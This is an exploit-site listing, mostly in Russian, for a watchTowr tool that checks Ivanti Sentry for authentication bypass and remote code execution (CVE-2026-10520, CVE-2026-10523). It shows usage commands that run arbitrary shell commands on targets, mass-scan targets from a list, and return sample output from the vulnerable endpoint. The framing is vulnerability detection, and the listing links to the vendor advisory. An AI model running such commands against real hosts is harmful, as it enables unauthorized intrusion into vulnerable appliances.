Sploitus

Exploit for RCE

kitploit Β· 2026-08-25

Exploit Code

MARKDOWN77 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-IMBAS007-RCE-CVE-2026-10520-CVE-2026-10523
# CVE-2026-10520 ΠΈ CVE-2026-10523

Π“Π΅Π½Π΅Ρ€Π°Ρ‚ΠΎΡ€ Π°Ρ€Ρ‚Π΅Ρ„Π°ΠΊΡ‚ΠΎΠ² обнаруТСния ΠΎΠ±Ρ…ΠΎΠ΄Π° Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΠΈ ΠΈ ΡƒΠ΄Π°Π»Π΅Π½Π½ΠΎΠ³ΠΎ выполнСния ΠΊΠΎΠ΄Π° Π² Ivanti Sentry.

ВСхничСскиС подробности см. Π² нашСм Π±Π»ΠΎΠ³Π΅.

# ΠžΠ±Π½Π°Ρ€ΡƒΠΆΠ΅Π½ΠΈΠ΅ Π² дСйствии

root@kitploit:~
    
    
    $ python3 CVE-2026-10523.py --url https://127.0.0.1 --cmd "uname -a"
                             __         ___  ___________                   
             __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
             \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
              \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
               \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                      \/          \/     \/                            
    
            CVE-2026-10523.py
    
            (*) Ivanti Sentry Authentication Bypass and Remote Code Execution Detection Artifact Generator Tool
    
              - Sonny , watchTowr (some-email@example.com)
    
            CVEs: [CVE-2026-10520, CVE-2026-10523]
    
    ============================================================
    Target: https://127.0.0.1
    Command: uname -a
    
    [+] Sending command execution check to: https://127.0.0.1/mics/api/v2/sentry/mics-config/handleMessage
    [+] Target appears to be vulnerable.
    
    Command output:
    Linux 127.0.0.1 4.18.0-553.84.1.el8_10.x86_64 #1 SMP Mon Nov 17 12:53:24 PST 2025 x86_64 x86_64 x86_64 GNU/Linux
    

# ИспользованиС

ΠžΠ΄ΠΈΠ½ΠΎΡ‡Π½Π°Ρ Ρ†Π΅Π»ΡŒ:

root@kitploit:~
    
    
    python3 CVE-2026-10523.py --url https://127.0.0.1 --cmd "uname -a"
    

НСсколько Ρ†Π΅Π»Π΅ΠΉ ΠΈΠ· Ρ„Π°ΠΉΠ»Π° (ΠΏΠΎ ΠΎΠ΄Π½ΠΎΠΌΡƒ URL Π² строкС, пустыС строки ΠΈ ΠΊΠΎΠΌΠΌΠ΅Π½Ρ‚Π°Ρ€ΠΈΠΈ `#` ΠΈΠ³Π½ΠΎΡ€ΠΈΡ€ΡƒΡŽΡ‚ΡΡ):

root@kitploit:~
    
    
    python3 CVE-2026-10523.py -l targets.txt --cmd "uname -a"
    

ИспользованиС прокси:

root@kitploit:~
    
    
    python3 CVE-2026-10523.py -l targets.txt --cmd "id" -p 127.0.0.1:8080
    

Π Π΅ΠΆΠΈΠΌ списка сканируСт ΠΊΠ°ΠΆΠ΄ΡƒΡŽ Ρ†Π΅Π»ΡŒ, ΠΏΡ€ΠΎΠ΄ΠΎΠ»ΠΆΠ°Π΅Ρ‚ Ρ€Π°Π±ΠΎΡ‚Ρƒ ΠΏΡ€ΠΈ ΠΎΡˆΠΈΠ±ΠΊΠ°Ρ… соСдинСния ΠΈ Π² ΠΊΠΎΠ½Ρ†Π΅ Π²Ρ‹Π²ΠΎΠ΄ΠΈΡ‚ сводку уязвимых хостов.

# ОписаниС

Π­Ρ‚ΠΎΡ‚ Π³Π΅Π½Π΅Ρ€Π°Ρ‚ΠΎΡ€ Π°Ρ€Ρ‚Π΅Ρ„Π°ΠΊΡ‚ΠΎΠ² обнаруТСния watchTowr провСряСт Π½Π°Π»ΠΈΡ‡ΠΈΠ΅ уязвимостСй ΠΎΠ±Ρ…ΠΎΠ΄Π° Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΠΈ ΠΈ ΡƒΠ΄Π°Π»Π΅Π½Π½ΠΎΠ³ΠΎ выполнСния ΠΊΠΎΠ΄Π° Π² Ivanti Sentry: CVE-2026-10520, CVE-2026-10523.

Π Π΅ΠΊΠΎΠΌΠ΅Π½Π΄Π°Ρ†ΠΈΠΈ ΠΏΠΎ ΡƒΡΡ‚Ρ€Π°Π½Π΅Π½ΠΈΡŽ ΠΈ Π΄ΠΎΠΏΠΎΠ»Π½ΠΈΡ‚Π΅Π»ΡŒΠ½Ρ‹Π΅ свСдСния ΠΏΡ€ΠΈΠ²Π΅Π΄Π΅Π½Ρ‹ Π² Π±ΡŽΠ»Π»Π΅Ρ‚Π΅Π½Π΅ Ivanti: https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523

Авторы:

  * https://labs.watchtowr.com/
  * https://x.com/watchtowrcyber